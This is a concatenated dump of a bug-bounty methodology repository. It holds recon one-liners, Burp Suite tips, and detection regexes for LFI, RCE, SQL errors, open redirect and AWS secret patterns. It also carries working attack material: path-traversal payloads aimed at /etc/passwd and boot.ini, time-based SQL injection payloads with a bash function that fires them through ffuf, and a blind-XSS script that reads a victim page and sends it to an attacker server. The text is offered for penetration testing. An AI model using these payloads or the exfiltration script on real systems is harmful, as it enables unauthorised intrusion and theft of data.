\(include_path=|fread\(|Failed opening required|Warning: file_get_contents\(|Fatal error: require_once\(|Warning: file_exists\( 15 | ``` 16 | 17 | ##### Unix Payloads: 18 | ``` 19 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd 20 | ../../../../../../../../../../../../../../../etc/passwd 21 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00 22 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html 23 | /etc/passwd 24 | ``` 25 | 26 | another type of LFI http://website/zen-cart/extras/curltest.php?url=file:///etc/passwd 27 | ``` 28 | file:///etc/passwd 29 | /etc/passwd%00 30 | /etc/passwd%00.html 31 | /etc/passwd%00.ext 32 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext 33 | ``` 34 | 35 | ##### Windows Payloads: 36 | ``` 37 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini 38 | ../../../../../../../../../../../../../../../boot.ini 39 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00 40 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html 41 | C:\\boot.ini 42 | C:\\boot.ini%00 43 | C:\\boot.ini%00.html 44 | %SYSTEMROOT%\\win.ini 45 | %SYSTEMROOT%\\win.ini%00 46 | %SYSTEMROOT%\\win.ini%00.html 47 | file:///C:/boot.ini 48 | file:///C:/win.ini 49 | C:\\boot.ini%00.ext 50 | %SYSTEMROOT%\\win.ini%00.ext 51 | ``` 52 | search in response 53 | ##### Regexp: 54 | ``` 55 | root:|for 16-bit app support|boot loader 56 | ``` 57 | Payloads: 58 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /MyBugBountyMethodology.md: -------------------------------------------------------------------------------- 1 | # 1. 
Recon 2 | ## 1.1 Collect Subdomains 3 | 4 | Change "domain.com" with your domain 5 | 6 | ### ~ crt.sh 7 | ```$ curl -s https://crt.sh/?q=%25.domain.com\&output=json | jq '.[].name_value' | sort -u | sed 's/"//g' | sed '/^*/d'``` 8 | 9 | ### ~ certspotter 10 | ```$ curl -s https://certspotter.com/api/v0/certs\?domain\=domain.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep domain.com``` 11 | 12 | ### ~ Virustotal 13 | ```https://www.virustotal.com/gui/domain/domain.com/relations``` 14 | 15 | ### ~ SecurityTrails 16 | ```https://securitytrails.com/list/apex_domain/domain.com``` 17 | 18 | ### ~ Github 19 | ```https://github.com/search?q="domain.com"``` 20 | 21 | ### ~ Censys 22 | ```443.https.tls.certificate.parsed.names: domain.com``` 23 | 24 | ### ~ bgp 25 | ```https://bgp.he.net/``` 26 | 27 | ### ~ Findomain 28 | ```https://github.com/Edu4rdSHL/findomain``` 29 | 30 | ```findomain -t domain.com``` 31 | 32 | ### ~ Amass 33 | ```https://github.com/OWASP/Amass``` 34 | 35 | ```$ amass enum -d domain.com``` 36 | 37 | ### ~ Subfinder 38 | ```https://github.com/subfinder/subfinder``` 39 | 40 | ```$ ./subfinder -d domain.com -b -w jhaddix_all.txt -t 100``` 41 | 42 | ```jhaddix all.txt: https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056``` 43 | 44 | ### Unique subdomains list 45 | ```$ cat file1 file2 file3 | sort -u | tee uniqSubdomains``` 46 | 47 | 48 | 49 | 50 | 51 | ## 1.2 Burp Suite 52 | * 1.2.1 [Export unique subdomains to Burp Suite](https://github.com/ghsec/webHunt/blob/master/SubdomainsToBurp.md) 53 | 54 | * 1.2.2 [Recon with Burp](https://github.com/ghsec/webHunt/blob/master/ReconWithBurp_Suite.md) 55 | 56 | [Demo Videos:](https://www.youtube.com/watch?v=-6ck9WhdtPk&list=PLq8PHzHe7znWfoKfi2ieVVC42_11u4t_C) 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /OpenRedirect_SSRF.md: -------------------------------------------------------------------------------- 1 | ### 
Open Redirect|SSRF

Possible Open Redirect | SSRF detection regexp. It flags parameters whose value is a URL, whether plain, URL-encoded once, twice or three times, or base64-encoded (`aHR0c` is the base64 prefix of `http`, `PWh0dH` of `=htt`):

```
(=|%3D|%253D|%25253D)(http(s)?(%3A%2F%2F|%253A%252F%252F|%25253A%25252F%25252F|:\/\/)|aHR0c)|PWh0dH
```

### Detect Open Redirect in response

Assumes the payload redirects to https://www.google.com; change the host if you use another target.

```
.*?; *?URL *?= *?(.*)|window\.location(\s=\s|\.href|\.replace)?(\(|\s=\s)?(https\:\/\/www\.)?google\.com(\))|Location:\shttps:\/\/www\.google\.com
```
#### Payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect/Intruder

--------------------------------------------------------------------------------
/RCE.md:
--------------------------------------------------------------------------------
### RCE:

##### Payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection/Intruder

##### Regexp | Keywords
Search in the response. `Syntax error` and `sh:` are generic and will also fire on unrelated pages, so treat those two as hints; and never leave an empty alternative (`||`) in the joined regexp, since an empty branch matches every response.
```
root:|(uid|gid|groups)=\d+|bytes from \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|Configuration File \(php\.ini\) Path |vulnerable 10|Trying \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\s+localhost|BROADCAST,MULTICAST|drwxr-xr|Active Internet connections|Syntax error|sh:|Average Speed Time|dir: cannot access|drwxrwxr|GNU/Linux
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# WebHunt
=======
# The Amazing WebHunt!


Twitter: @[GochaOqradze](https://twitter.com/GochaOqradze)

```
An Amazing Project
Web app testing for Bug Bounty Hunting with Burp Suite Pro|Community version
```

### Donate me:
https://www.paypal.me/Okradze

=======

Thank you, and don't forget to donate!



--------------------------------------------------------------------------------
/ReconWithBurp_Suite.md:
--------------------------------------------------------------------------------
# Recon with BurpSuite "with love from Georgia"

### Download and run
* Download [Burp Suite](https://portswigger.net/burp/communitydownload)
* Run in terminal
```
java -jar burpsuite_community_v1.7.36.jar
```

### Set scope
* Scope --> Use advanced scope control --> Add --> host or IP range == target

![Scope](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-25-10.png)

### Spidering
* Select all hosts in the sitemap and Spider.
* Repeat whenever new hosts show up.

### Recon for new Subdomains
* Collect new subdomains that the spider did not find, from the request | response body. The `{1,20}` bound limits the prefix to 20 characters; raise it if the target uses long host names.
```
(http[s]?:\/\/)?((-)?[\w+\.]){1,20}domain\.com
```
Note: click the + button and check "regex" and "Auto-scroll to match when text changes".

![ReconSubdomain](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-40-35.png)

### Extract endpoints from js file
note: regex taken from Linkfinder by GerbenJavado
```
(?:"|')(((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|')
```
![Endpoints](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2009-56-26.png)

### Internal | External IP address
```
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
```
![IP](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2010-08-11.png)

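The endpoint and subdomain regexes above are pasted into Burp's search box, which leaves resolving `../auth/login` or `//cdn.domain.com/x.js` against the page URL, and percent-decoding, to the reader. The Python below is an added example, not the repository's code: it runs the same LinkFinder regex over a script, resolves every hit against the script's URL, and extracts in-scope subdomains with a bounded version of the SubRegex.md pattern after percent-decoding, which is what prevents the `2Fsub.domain.com` artefact that URL-encoded `%2F` otherwise leaves in front of a host name. The sample script and every host name in it are constructed; `domain.com` is the placeholder used throughout this repository.

```python
import re
from urllib.parse import unquote, urljoin

# The LinkFinder regex exactly as listed in ReconWithBurp_Suite.md / EndpointsExtractor.md.
LINKFINDER_RE = re.compile(
    r"""(?:"|')(((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|')"""
)


def subdomain_re(domain: str) -> re.Pattern:
    """SubRegex.md's ([a-zA-Z0-9-_]{1,}\\.){1,}domain\\.com with boundaries added so that
    'xdomain.com', 'evil-2.domain.com'[2:] and 'domain.com.evil.example' are rejected."""
    return re.compile(
        r"(?<![A-Za-z0-9_.-])(?:[A-Za-z0-9_-]+\.)+" + re.escape(domain) + r"(?![A-Za-z0-9_-]|\.[A-Za-z0-9])",
        re.IGNORECASE,
    )


def extract_endpoints(content: str, base_url: str) -> list[str]:
    """Every quoted endpoint in JS/HTML, resolved against the URL the content came from."""
    text = unquote(content)  # "https%3A%2F%2F..." would not match the regex otherwise
    found = {urljoin(base_url, m.group(1)) for m in LINKFINDER_RE.finditer(text)}
    return sorted(found)


def extract_subdomains(content: str, domain: str) -> list[str]:
    """In-scope host names, lower-cased and de-duplicated."""
    text = unquote(content)  # decode first: otherwise %2Fsub.domain.com yields "2Fsub.domain.com"
    return sorted({m.group(0).lower() for m in subdomain_re(domain).finditer(text)})


# Constructed sample script (not taken from any real site).
SAMPLE_JS = """
// constructed sample, not from any real application
var API = "/api/v1/users.json";
var LOGIN = '../auth/login';
var CDN = "//cdn.domain.com/bundle.js";
var ADMIN = "https://admin-2.domain.com/panel";
var ENC = "https%3A%2F%2Finternal-api.domain.com%2Fhealth";
var OTHER = "https://assets.otherdomain.com/x.png";
var FAKE = "http://domain.com.evil.example/phish";
"""

if __name__ == "__main__":
    base = "https://app.domain.com/static/js/app.js"   # assumed location of the script
    for url in extract_endpoints(SAMPLE_JS, base):
        print("endpoint ", url)
    for host in extract_subdomains(SAMPLE_JS, "domain.com"):
        print("subdomain", host)
```

`extract_endpoints` deliberately keeps out-of-scope and look-alike hosts (`assets.otherdomain.com`, `domain.com.evil.example`) because they are still worth a look for SSRF or open-redirect targets; scope filtering is the subdomain extractor's job, and its look-around is what stops `admin-2.domain.com` from also being reported as `2.domain.com`.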
--------------------------------------------------------------------------------
/SQLiError.md:
--------------------------------------------------------------------------------
### Sqli Error
Injection points - headers | Cookie | path, GET | POST parameters

### Error Regexps
```
(Exception (condition )?\d+\. Transaction rollback|com\.frontbase\.jdbc|org\.h2\.jdbc|Unexpected end of command in statement \["|Unexpected token.*?in statement \[|org\.hsqldb\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\bdb2_\w+\(|SQLSTATE.+SQLCODE|com\.ibm\.db2\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\]Ibm|DB2Exception|Warning.*?\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\.informix\.jdbc|weblogic\.jdbc\.informix|Pdo[./_\\]Informix|IfxException|Warning.*?\Wingres_|Ingres SQLSTATE|Ingres\W.*?Driver|com\.ingres\.gcf\.jdbc|Dynamic SQL Error|Warning.*?\Wibase_|org\.firebirdsql\.jdbc|Pdo[./_\\]Firebird|Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \(missing operator\) in query expression|Driver.*? SQL[\-\_\ ]*Server|OLE DB.*? SQL Server|\bSQL Server[^<"]+Driver|Warning.*?\W(mssql|sqlsrv)_|\bSQL Server[^<"]+[0-9a-fA-F]{8}|System\.Data\.SqlClient\.SqlException|(?s)Exception.*?\bRoadhouse\.Cms\.|Microsoft SQL Native Client error '[0-9a-fA-F]{8}|\[SQL Server\]|ODBC SQL Server Driver|ODBC Driver \d+ for SQL Server|SQLServer JDBC Driver|com\.jnetdirect\.jsql|macromedia\.jdbc\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\.microsoft\.sqlserver\.jdbc|Pdo[./_\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column '[^ ]+' in 'field list'|MySqlClient\.|com\.mysql\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\]Mysql|MySqlException|\bORA-\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\.jdbc\.oracle|oracle\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\Wpg_|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\.postgresql\.jdbc|Pdo[./_\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\Wmaxdb_|DriverSapDB|com\.sap\.dbtech\.jdbc|SQLite/JDBCDriver|SQLite\.Exception|(Microsoft|System)\.Data\.SQLite\.SQLiteException|Warning.*?\W(sqlite_|SQLite3::)|\[SQLITE_ERROR\]|SQLite error \d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\.sqlite\.JDBC|Pdo[./_\\]Sqlite|SQLiteException|Warning.*?\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\.Data\.AseClient|com\.sybase\.jdbc)
```

#### Payloads:
```
'
"
\
`
*
```
--------------------------------------------------------------------------------
/Secret_Patterns_db.MD:
--------------------------------------------------------------------------------
## AWS API Gateway

```
[0-9a-z]+.execute-api.[0-9a-z._-]+.amazonaws.com
```

Example: https://grep.app/search?q=%5B0-9a-z%5D%2B.execute-api.%5B0-9a-z._-%5D%2B.amazonaws.com&regexp=true


## AWS API Key

```
AKIA[0-9A-Z]{16}
```

Example: https://grep.app/search?q=AKIA%5B0-9A-Z%5D%7B16%7D&regexp=true

## AWS ARN

```
arn:aws:[a-z0-9-]+:[a-z]{2}-[a-z]+-[0-9]+:[0-9]+:.+
```

Example: https://grep.app/search?q=arn%3Aaws%3A%5Ba-z0-9-%5D%2B%3A%5Ba-z%5D%7B2%7D-%5Ba-z%5D%2B-%5B0-9%5D%2B%3A%5B0-9%5D%2B%3A.%2B&regexp=true

## AWS AppSync GraphQL Key
```
da2-[a-z0-9]{26}
```

Example: https://grep.app/search?q=da2-%5Ba-z0-9%5D%7B26%7D&regexp=true

--------------------------------------------------------------------------------
/SubRegex.md:
--------------------------------------------------------------------------------
### Extract Subdomains with burp + regexp
```
([a-zA-Z0-9-_]{1,}\.){1,}domain\.com
```

### Terminal : OneLiner
```
# sed strips a leading "2F" left behind when the match starts inside a %2F-encoded URL
cat urls | grep -oP "([a-zA-Z0-9-_]{1,}\.){1,}domain\.com" | sed 's/^2F//' | sort -u
```
--------------------------------------------------------------------------------
/SubdomainsToBurp.md:
--------------------------------------------------------------------------------
# Subdomains to Burp Suite
Export subdomains from a file to Burp Suite, by [@tvmpt](https://twitter.com/tvmpt)

```cat | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s```
--------------------------------------------------------------------------------
/Time-Based-SQLi.md:
--------------------------------------------------------------------------------
## Time Based Sql Injection with ffuf
Check a URL list for time based SQLi with ffuf

Requires ffuf and qsreplace:

* ffuf: ```go get -u github.com/ffuf/ffuf```
* qsreplace: ```go get -u github.com/tomnomnom/qsreplace```

* Payloads: save these in a payloads file

```
XOR(if(now()=sysdate(),sleep(5),0))OR%27
if(now()=sysdate(),sleep(5),0)
(select(0)from(select(sleep(5)))v)/*%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22*/
%27XOR(if(now()=sysdate(),sleep(5*1),0))XOR%27Z
1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%27
1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27
1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-1337
1%20or%20sleep(5)%23
%27%20WAITFOR%20DELAY%20%270:0:5%27--
%%27;SELECT%20PG_SLEEP(5)--
pg_sleep(5)
%27|%20|pg_sleep(5)--
```

* Add this function to .bashrc

```
# Time Based Sql Injection
sqliTime(){
    # read the payloads line by line on fd 3, so that * and / inside a payload
    # are never glob-expanded and the inner commands cannot eat the loop's input
    while IFS= read -r i <&3; do
        cat "$1" | qsreplace "$i" > sqli
        ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
        rm sqli
    done 3< ~/.pathToPayloadsList/payloads
}
```

### Usage:
```
sqliTime urls.txt
```
--------------------------------------------------------------------------------
/WEB APPLICATION PENTESTING CHECKLIST.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/WEB APPLICATION PENTESTING CHECKLIST.pdf
--------------------------------------------------------------------------------
/WebDAV.md:
--------------------------------------------------------------------------------
# WebDAV

Verify if the WebDAV module is properly configured.
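As an added example that is not part of the original notes, the script below performs the PROPFIND and PUT checks the notes describe against one directory URL and maps the PUT status code to the same findings: upload allowed, 403 directory not writable, 500 DAV extension failed. The marker file name and content are assumptions, and a marker that was accepted is deleted again so the audit leaves nothing behind.

```python
import re
import urllib.error
import urllib.request

# Hypothetical marker file (assumption): a harmless name and body so an accepted
# PUT can be recognised and removed again.
MARKER_NAME = "webdav-config-check.txt"
MARKER_BODY = b"webdav configuration check\n"

# Minimal RFC 4918 PROPFIND body that asks only for displayname.
PROPFIND_BODY = (b'<?xml version="1.0" encoding="utf-8"?>'
                 b'<D:propfind xmlns:D="DAV:"><D:prop><D:displayname/></D:prop></D:propfind>')

# Any prefix bound to the DAV: namespace; the notes grep for xmlns:a="DAV:" only.
DAV_NS = re.compile(rb'xmlns(?::[A-Za-z0-9_-]+)?="DAV:"')

def dav_enabled(body):
    return DAV_NS.search(body) is not None

def classify_put(status):
    # Same three outcomes the notes describe, plus the two "PUT is off" codes.
    if status in (200, 201, 204):
        return "upload-allowed"      # file written: anonymous PUT must be disabled
    if status == 403:
        return "dir-not-writable"    # DAV works, server cannot write to the directory
    if status == 500:
        return "dav-broken"          # DAV extension failed
    if status in (405, 501):
        return "put-disabled"
    return "unknown"

def send(method, url, body, headers):
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()

def check_webdav(base_url):
    xml_headers = {"Content-Type": 'application/xml; charset="utf-8"', "Depth": "1"}
    status, body = send("PROPFIND", base_url, PROPFIND_BODY, xml_headers)
    result = {"propfind_status": status, "dav_enabled": dav_enabled(body)}
    target = base_url.rstrip("/") + "/" + MARKER_NAME
    status, _ = send("PUT", target, MARKER_BODY, {"Content-Type": "text/plain"})
    result["put"] = classify_put(status)
    if result["put"] == "upload-allowed":          # clean up the marker again
        result["delete_status"] = send("DELETE", target, None, {})[0]
    return result
```

Run `check_webdav("https://host.example/dav/")` against a directory you administer; the returned dict is the finding to put in the report.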

```
CONTENT_TYPE = Headers([('content-type', 'application/xml; charset="utf-8"')])
```

### Test SEARCH method

```
Select 'DAV:displayname' from scope()
```

#### Detect
```
xmlns:a="DAV:"
```

If the response is 200 or 300 and contains a directory name and path, a directory listing via the HTTP SEARCH method was found.

### Test PROPFIND method

```
```

### Test PUT method

```
headers = Headers([('content-type', 'text/plain')])
```

If the file is uploaded, file upload with the HTTP PUT method was found at the resource.

If the web server answers with a 500 error code, DAV seems to be incorrectly configured; in most cases this means that the DAV extension failed in some way.

If it answers 403, DAV seems to be correctly configured and allows you to use the PUT method, but the directory does not have the permissions that would allow the web server to write to it.

This technique finds WebDAV configuration errors. These errors are generally server configuration errors rather than web application errors. To check for vulnerabilities of this kind, try to PUT a file in a directory that has WebDAV enabled; if the file is uploaded successfully, a bug has been found.
--------------------------------------------------------------------------------
/bxss_js.md:
--------------------------------------------------------------------------------
## BXSS file

### Content of JS file

```
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://Victim.com/path/file.php', true);
xhr.setRequestHeader('Content-type', 'application/x-www-urlencoded');

xhr.onload = function () {
    var request = new XMLHttpRequest();
    request.open('GET', 'http://YorServerHere:PORT/?code=' + btoa(xhr.responseText), true);
    request.send();
};

xhr.send();
```

reference: https://xakep.ru/2021/03/22/htb-crossfit-xss/
--------------------------------------------------------------------------------
/content_discovery.md:
--------------------------------------------------------------------------------
# Content Discovery:

## Tools:
* [Ffuf](https://github.com/ffuf/ffuf)
* [Dirsearch](https://github.com/maurosoria/dirsearch)

## Wordlists:
* [RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed)
* [SecLists Web Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
* [content_discovery_nullenc0de](https://gist.github.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7)
* [content_discovery_all](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [commonspeak2](https://github.com/assetnote/commonspeak2-wordlists)
--------------------------------------------------------------------------------
/file_upload.md:
--------------------------------------------------------------------------------
### file_upload

Uploads a file and then searches for the file inside all known directories.

#### Common Upload Path
```
uploads
upload
up
files
file
user
content
images
documents
docs
downloads
download
down
public
pub
private
```
Analyze the results of the _send_mutant method.
In this case, check whether the file was uploaded to any of the known directories, or to one of the "default" ones such as "upload" or "files".

Parse the HTTP response and find our file.
Take into account that the file name might have been changed (we do not care); if the extension remains the same, we're happy.

Use the framework's knowledge to find the file in all possible locations.
--------------------------------------------------------------------------------
/htmlattribs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/htmlattribs
--------------------------------------------------------------------------------
/paramName-inputTag.md:
--------------------------------------------------------------------------------
## collect hidden parameters

OneLiner: Collect hidden parameters from requests with parallel and grep

The command greps the parameter name in the input tag.

Example: the command extracts the ```something``` parameter name from an input tag.


### Terminal:

```
cat urls | parallel -j 200 curl -s {} | grep "
```